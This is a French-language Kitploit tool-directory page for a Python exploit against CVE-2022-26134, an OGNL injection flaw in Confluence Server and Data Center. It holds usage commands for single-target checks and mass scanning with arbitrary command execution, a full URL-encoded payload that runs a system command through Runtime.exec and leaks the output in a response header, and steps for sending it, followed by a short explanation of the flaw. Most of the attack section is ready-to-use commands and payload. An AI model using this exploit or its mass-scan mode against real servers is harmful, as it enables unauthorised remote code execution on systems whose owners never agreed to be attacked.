Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26134 — Exploit basé sur Python pour CVE-2022-26134, une vulnérabilité d'injection OGNL dans Confluence Server et Data Center. Prend en charge la vérification d'une URL unique et le scan par lots avec exécution de commandes arbitraires. | Kitploit
Outils/GitHubGitHub/ytxzx/cve-2022-26134
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et Contrôle
GitHubytxzx/cve-2022-26134

CVE-2022-26134

Exploit basé sur Python pour CVE-2022-26134, une vulnérabilité d'injection OGNL dans Confluence Server et Data Center. Prend en charge la vérification d'une URL unique et le scan par lots avec exécution de commandes arbitraires.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-26134 - Vulnérabilité d'injection OGNL dans Confluence

Utilisation du script

Installer la bibliothèque Python

pip install -r requirements.txt

Vérification de la vulnérabilité

python3 CVE-2022-26134_check.py -u url -c whoami

image

Scan en masse

python3 CVE-2022-26134_check.py -f url.txt -c whoami

image

Versions affectées

Confluence Server and Data Center >= 1.3.0

Confluence Server and Data Center < 7.4.17

Confluence Server and Data Center < 7.13.7

Confluence Server and Data Center < 7.14.3

Confluence Server and Data Center < 7.15.2

Confluence Server and Data Center < 7.16.4

Confluence Server and Data Center < 7.17.4

Confluence Server and Data Center < 7.18.1

Reproduction de la vulnérabilité

payload :

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/

Accédez au service Confluence, interceptez le paquet dont le code de retour est 302, envoyez le paquet contenant le payload ; dans le paquet de réponse, le paramètre X-Qualys-Response renverra le nom d'utilisateur actuel du serveur.

image

Principe de la vulnérabilité

L'URI fourni par l'attaquant est converti en namespace, puis ce namespace est converti en expression OGNL pour être évalué (l'URL fournie par l'attaquant est indirectement transformée en expression OGNL en vue de son évaluation).

Télécharger l’outil